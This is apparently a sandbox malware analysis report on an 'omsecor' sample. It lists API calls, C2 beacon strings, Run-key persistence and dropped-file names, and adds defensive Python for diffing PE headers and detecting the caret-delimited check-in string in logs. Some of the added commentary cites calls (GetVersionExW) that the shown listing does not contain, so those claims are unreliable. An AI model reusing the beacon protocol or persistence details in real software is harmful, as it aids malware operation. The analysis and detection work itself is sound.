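"""Report which IMAGE_NT_HEADERS32 fields differ between two PE32 files.

Added example; not code from the Joe Sandbox report or from the sample.
Usage: python pe_header_diff.py original.exe dropped_copy.exe
"""
import struct
from typing import Dict, List, Tuple

DOS_HEADER_SIZE = 0x40      # sizeof(IMAGE_DOS_HEADER)
NT_HEADERS32_SIZE = 0xF8    # sizeof(IMAGE_NT_HEADERS32)

# Field layout of IMAGE_NT_HEADERS32: Signature + IMAGE_FILE_HEADER + IMAGE_OPTIONAL_HEADER32.
NT_FIELDS: List[Tuple[str, str]] = [
    ("Signature", "I"),
    ("Machine", "H"), ("NumberOfSections", "H"), ("TimeDateStamp", "I"),
    ("PointerToSymbolTable", "I"), ("NumberOfSymbols", "I"),
    ("SizeOfOptionalHeader", "H"), ("Characteristics", "H"),
    ("Magic", "H"), ("MajorLinkerVersion", "B"), ("MinorLinkerVersion", "B"),
    ("SizeOfCode", "I"), ("SizeOfInitializedData", "I"),
    ("SizeOfUninitializedData", "I"), ("AddressOfEntryPoint", "I"),
    ("BaseOfCode", "I"), ("BaseOfData", "I"), ("ImageBase", "I"),
    ("SectionAlignment", "I"), ("FileAlignment", "I"),
    ("MajorOperatingSystemVersion", "H"), ("MinorOperatingSystemVersion", "H"),
    ("MajorImageVersion", "H"), ("MinorImageVersion", "H"),
    ("MajorSubsystemVersion", "H"), ("MinorSubsystemVersion", "H"),
    ("Win32VersionValue", "I"), ("SizeOfImage", "I"), ("SizeOfHeaders", "I"),
    ("CheckSum", "I"), ("Subsystem", "H"), ("DllCharacteristics", "H"),
    ("SizeOfStackReserve", "I"), ("SizeOfStackCommit", "I"),
    ("SizeOfHeapReserve", "I"), ("SizeOfHeapCommit", "I"),
    ("LoaderFlags", "I"), ("NumberOfRvaAndSizes", "I"),
] + [(f"DataDirectory[{i}].{part}", "I")
     for i in range(16) for part in ("VirtualAddress", "Size")]
NT_NAMES = [name for name, _ in NT_FIELDS]
NT_FORMAT = "<" + "".join(fmt for _, fmt in NT_FIELDS)   # little-endian, packs to exactly 0xF8 bytes


def parse_nt_headers(image: bytes) -> Dict[str, int]:
    """Follow e_lfanew to the NT headers and unpack them into a name -> value map."""
    if len(image) < DOS_HEADER_SIZE or image[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    raw = image[e_lfanew:e_lfanew + NT_HEADERS32_SIZE]
    if len(raw) != NT_HEADERS32_SIZE:
        raise ValueError("truncated NT headers")
    fields = dict(zip(NT_NAMES, struct.unpack(NT_FORMAT, raw)))
    if fields["Signature"] != 0x4550:      # "PE\0\0"
        raise ValueError("missing PE signature")
    if fields["Magic"] != 0x10B:           # PE32 only; the sample is a 32-bit PE
        raise ValueError("only PE32 images are handled here")
    return fields


def diff_nt_headers(original: bytes, copy: bytes) -> List[Tuple[str, int, int]]:
    """List (field, value in original, value in copy) for every field that differs."""
    a, b = parse_nt_headers(original), parse_nt_headers(copy)
    return [(name, a[name], b[name]) for name in NT_NAMES if a[name] != b[name]]


def build_min_pe(timestamp: int, checksum: int) -> bytes:
    """Constructed header-only PE32 image used as demo input (not a real binary)."""
    dos = bytearray(DOS_HEADER_SIZE)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, DOS_HEADER_SIZE)   # e_lfanew: NT headers follow the DOS header
    values = {name: 0 for name in NT_NAMES}
    values.update(Signature=0x4550, Machine=0x14C, SizeOfOptionalHeader=0xE0,
                  Characteristics=0x102, Magic=0x10B, ImageBase=0x400000,
                  SectionAlignment=0x1000, FileAlignment=0x200, NumberOfRvaAndSizes=16,
                  TimeDateStamp=timestamp, CheckSum=checksum)
    return bytes(dos) + struct.pack(NT_FORMAT, *(values[name] for name in NT_NAMES))


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        with open(sys.argv[1], "rb") as f1, open(sys.argv[2], "rb") as f2:
            orig, dropped = f1.read(), f2.read()
    else:   # no files given: diff two constructed images that differ in two fields
        orig, dropped = build_min_pe(0x5F000000, 0), build_min_pe(0x5F000001, 0x1234)
    for name, old, new in diff_nt_headers(orig, dropped):
        print(f"{name}: {old:#x} -> {new:#x}")
```

Run it against the submitted sample and the copy dropped under C:\Windows; an empty diff means the rewrite kept the header byte-identical and the 0xF8-byte write is a no-op, while a diff limited to fields such as TimeDateStamp or CheckSum would explain why the dropped file and the original carry different hashes without any code change.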

                  Control-flow Graph

                  control_flow_graph 73 409c99-409cac call 40d5b0 76 409cb9 73->76 77 409cae-409cb7 call 405451 73->77 79 409cbb-409cd6 InternetOpenUrlW 76->79 77->79 81 409cd8-409cda 79->81 82 409cdf-409d02 GetProcessHeap HeapAlloc 79->82 83 409df1-409df3 81->83 84 409d04-409d06 82->84 85 409d5b-409d77 InternetReadFile 82->85 86 409def-409df0 84->86 87 409d79-409d90 GetProcessHeap HeapAlloc 85->87 88 409d0b-409d10 85->88 86->83 90 409d92-409d95 87->90 91 409d97-409daa 87->91 88->87 89 409d12-409d1d 88->89 92 409d3d-409d59 call 40c5d0 89->92 93 409d1f-409d3b GetProcessHeap HeapReAlloc 89->93 94 409de0-409dec GetProcessHeap HeapFree 90->94 95 409dd6-409dde 91->95 96 409dac-409dae 91->96 92->85 93->84 93->92 94->86 95->94 96->95 98 409db0-409db6 96->98 98->95 100 409db8-409dca 98->100 100->95 101 409dcc-409dd4 100->101 101->95 101->100
                  APIs
                  • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                  • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                  • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                  • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                  • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                  • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                  • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                  • String ID: hOA
                  • API String ID: 1355009786-3485425990
                  • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                  • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                  • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                  • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CountTick
                  • String ID: .html$0$8@$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                  • API String ID: 536389180-1762329985
                  • Opcode ID: 114e4e40ed3da380897df1d948c25e04c4e8011c16955a8b70e5daac7b5a3a86
                  • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                  • Opcode Fuzzy Hash: 114e4e40ed3da380897df1d948c25e04c4e8011c16955a8b70e5daac7b5a3a86
                  • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59

                  Control-flow Graph

                  control_flow_graph 169 40a786-40a79a 170 40a7b3-40a7ea call 405511 call 4056f9 call 405529 169->170 171 40a79c 169->171 182 40a7f8-40a7fb call 4056f9 170->182 183 40a7ec-40a7f6 170->183 172 40a7a9 call 406d14 171->172 176 40a7ae-40a7b1 172->176 176->170 178 40a79e-40a7a3 Sleep 176->178 178->172 185 40a800-40a815 call 405529 182->185 183->185 188 40a823-40a826 call 4056f9 185->188 189 40a817-40a821 185->189 190 40a82b-40a846 call 405529 call 406cb5 188->190 189->190 196 40a854 call 4056f9 190->196 197 40a848-40a852 190->197 198 40a859-40a87e call 405529 call 4078cb call 40a718 196->198 197->198 206 40a880-40a892 call 40a744 198->206 209 40a894-40a899 Sleep 206->209 210 40a89f-40a8c5 call 406e69 206->210 209->210 213 40a8d2-40a8d5 210->213 214 40a8c7-40a8cc Sleep 210->214 215 40a8d7-40a8da 213->215 216 40a8dc-40a8df 213->216 214->213 215->216 217 40a8e1-40a8f8 GetProcessHeap HeapFree 215->217 216->206 216->217
                  APIs
                  • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                  • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                  • Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                  • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                  • API String ID: 3100629401-2436734164
                  • Opcode ID: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                  • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                  • Opcode Fuzzy Hash: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                  • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E
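The check-in loop above (InternetAttemptConnect, Sleep 0x2710 / 0xEA60 ms retries, then the HTTP request) formats its message with "confirm^rev=%s^code=%s^param=%s^os=%s"; the routine listed earlier with the "^key=" and "^nocrypt" strings uses the same caret-delimited key=value convention. The report does not show where in the request the string goes (URL, body or header), so the added example below, which is not code from the report or the sample, searches whole log lines, also accepts the percent-encoded form (a caret becomes %5E in a URL), and parses any caret-delimited string of this shape into fields. The log lines are constructed; hosts and paths in them are placeholders.

```python
"""Find the caret-delimited check-in string from this report in HTTP logs.

Added example; not code from the Joe Sandbox report or from the sample.
The format "confirm^rev=%s^code=%s^param=%s^os=%s" is the only part taken
from the report; request placement and the sample log lines are assumptions.
"""
import re
from typing import Dict, Iterable, List, Tuple
from urllib.parse import unquote

# One caret-separated field value: anything up to the next ^, whitespace, & or quote.
_FIELD = r'[^^\s&"]*'
BEACON_RE = re.compile(
    r"confirm\^rev=" + _FIELD + r"\^code=" + _FIELD + r"\^param=" + _FIELD + r"\^os=" + _FIELD
)

# Constructed proxy log lines (not from the report); hosts and paths are placeholders.
SAMPLE_LOG: List[str] = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200',
    '10.0.0.5 - - "POST / HTTP/1.1" 200 body="confirm^rev=12^code=ABCD^param=0^os=6.1"',
    '10.0.0.5 - - "GET /?confirm%5Erev=12%5Ecode=ABCD%5Eparam=0%5Eos=10.0 HTTP/1.1" 404',
    '10.0.0.7 - - "GET /confirm.html HTTP/1.1" 200',
]


def parse_caret_fields(message: str) -> Dict[str, str]:
    """'confirm^rev=12^code=X' -> {'verb': 'confirm', 'rev': '12', 'code': 'X'}.

    Works for any caret-delimited verb^key=value^... string, so the same
    parser applies to strings built around the "^key=" / "^nocrypt" tokens.
    """
    verb, *pairs = message.split("^")
    fields = {"verb": verb}
    for pair in pairs:
        key, _, value = pair.partition("=")
        fields[key] = value
    return fields


def find_beacons(lines: Iterable[str]) -> List[Tuple[str, Dict[str, str]]]:
    """Return (original line, parsed fields) for every line carrying the check-in string."""
    hits: List[Tuple[str, Dict[str, str]]] = []
    for line in lines:
        match = BEACON_RE.search(unquote(line))   # decode %5E so URL-encoded carets match too
        if match:
            hits.append((line, parse_caret_fields(match.group(0))))
    return hits


if __name__ == "__main__":
    for line, fields in find_beacons(SAMPLE_LOG):
        print(fields, "<-", line)
```

The "os" field gives a cheap pivot when triaging hits: the loop above calls GetVersionExW before formatting the message, so its value should track the victim's Windows version, and a beacon whose "os" disagrees with the asset inventory for that source IP is worth a second look.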

                  Control-flow Graph

                  control_flow_graph 218 40782a-40786f GetModuleFileNameW CreateFileW 219 407871-407886 GetFileTime CloseHandle 218->219 220 407888-40788e GetTickCount 218->220 221 4078b0-4078ca call 4057b5 219->221 222 407893-40789d call 40584d 220->222 227 4078a6-4078ae 222->227 228 40789f-4078a5 222->228 227->221 227->222 228->227
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                  • CloseHandle.KERNEL32(00000000), ref: 00407880
                  • GetTickCount.KERNEL32 ref: 00407888
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: File$CloseCountCreateHandleModuleNameTickTime
                  • String ID: UniqueNum
                  • API String ID: 1853814767-3816303966
                  • Opcode ID: ad12cffd4843a03ac357a7cbd35bb16f9c39c4118ba2163eb990dc6e8f3d9bd4
                  • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                  • Opcode Fuzzy Hash: ad12cffd4843a03ac357a7cbd35bb16f9c39c4118ba2163eb990dc6e8f3d9bd4
                  • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB

                  Control-flow Graph

                  control_flow_graph 229 407e2b-407e3b 230 407e3d-407e3f call 407cd7 229->230 231 407e4e-407e7c SetFilePointer ReadFile 229->231 235 407e44-407e4c 230->235 232 407eba 231->232 233 407e7e-407e82 231->233 237 407ebc-407ebe 232->237 233->232 236 407e84 233->236 235->231 235->232 238 407e86-407e8f 236->238 238->238 239 407e91-407ea7 call 405493 238->239 239->232 242 407ea9-407eb8 call 405511 239->242 242->237
                  APIs
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                  • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                    • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: File$CreateModuleNamePointerRead
                  • String ID: UniqueNum$d$hOAd$x
                  • API String ID: 1528952607-1018652783
                  • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                  • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                  • Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                  • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE

                  Control-flow Graph

                  control_flow_graph 245 40ac20-40ac48 RegOpenKeyExW 246 40ac60-40ac76 RegOpenKeyExW 245->246 247 40ac4a-40ac55 call 4069c0 245->247 248 40ac78-40ac7a 246->248 249 40ac7c-40ac87 call 4069c0 246->249 253 40ac5a-40ac5e 247->253 251 40ac8e-40ac92 248->251 254 40ac8c-40ac8d 249->254 253->246 253->251 254->251
                  APIs
                  • RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                  • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Open$CloseQueryValue
                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                  • API String ID: 3546245721-4228964922
                  • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                  • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                  • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                  • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                  Control-flow Graph

                  APIs
                  • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                  • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                  • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CharLower$CommandFileLineModuleName
                  • String ID: /nomove
                  • API String ID: 1338073227-1111986840
                  • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                  • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                  • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                  • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                  Control-flow Graph

                  control_flow_graph 268 407cd7-407cfe call 40d5b0 GetModuleFileNameW 271 407d00-407d0b call 406cf9 268->271 272 407d0d-407d15 GetCurrentDirectoryW 268->272 274 407d1b-407d31 call 4054ed 271->274 272->274 278 407d33-407d35 274->278 279 407d36-407d60 CreateFileW 274->279 278->279
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                  • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: File$CreateCurrentDirectoryModuleName
                  • String ID: \merocz.xc6
                  • API String ID: 3818821825-505599559
                  • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                  • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                  • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                  • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA

                  Control-flow Graph

                  control_flow_graph 280 407727-407751 call 40d5b0 GetModuleFileNameW 283 407753-40776b call 4075d4 280->283 284 40776d-40776e 280->284 289 4077e1-4077ea 283->289 286 407774-4077a0 ExpandEnvironmentStringsW call 4075d4 284->286 291 4077a2-4077a5 286->291 292 4077eb-4077ee 286->292 293 4077b7-4077ba 291->293 294 4077a7-4077b5 GetLastError 291->294 295 4077e0 292->295 297 4077d2-4077dc 293->297 298 4077bc-4077c8 GetLastError 293->298 296 4077ca call 40a786 294->296 295->289 301 4077cf 296->301 297->286 300 4077de 297->300 298->296 300->295 301->297
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,771B0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                  • GetLastError.KERNEL32(00000004), ref: 004077A9
                    • Part of subcall function 004075D4: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                    • Part of subcall function 004075D4: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                  • String ID:
                  • API String ID: 1536607067-0
                  • Opcode ID: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                  • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                  • Opcode Fuzzy Hash: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                  • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                  Control-flow Graph (basic blocks, with successor blocks):
                  • 302: 4077f0-407829, call 40d530, CreateProcessW
                  APIs
                  • _memset.LIBCMT ref: 00407800
                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CreateProcess_memset
                  • String ID:
                  • API String ID: 1177741608-0
                  • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                  • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                  • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                  • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

                  Control-flow Graph (basic blocks, with successor blocks):
                  • 312: 4069c0-4069fc, RegQueryValueExW, RegCloseKey
                  APIs
                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                  • RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
